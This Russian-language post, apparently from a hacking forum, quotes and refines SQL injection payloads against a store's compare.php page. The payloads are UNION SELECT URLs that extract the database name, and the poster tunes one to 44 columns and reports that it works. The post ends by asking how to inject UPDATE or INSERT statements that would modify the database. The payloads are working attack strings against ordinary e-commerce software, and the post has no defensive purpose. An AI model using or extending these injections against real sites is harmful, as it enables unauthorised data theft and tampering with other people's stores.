|
Новичок
Регистрация: 12.05.2009
Сообщений: 2
Провел на форуме:
11834
Репутация:
0
|
|
Сообщение от laedafess
попробуй делать
Код:
site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6/*
или в конце +-- или %23 это не работает...
Сообщение от laedafess
или
Код:
site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+from+products as p, products_description as pd WHERE p.products_id+IN(1
Ну и естественно там не обязательно 6 столбцов. ну да, там получается 44 столбца и
Код:
site/compare.php?cPath=&products[]=1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,DATABASE(),37,38,39,40,41,42,43,44+from+products as p, products_description as pd WHERE p.products_id+IN(1
работает отлично.... только вот ешё вопрос:
можно ли сделать UPDATE, INSERT ? и как? 
|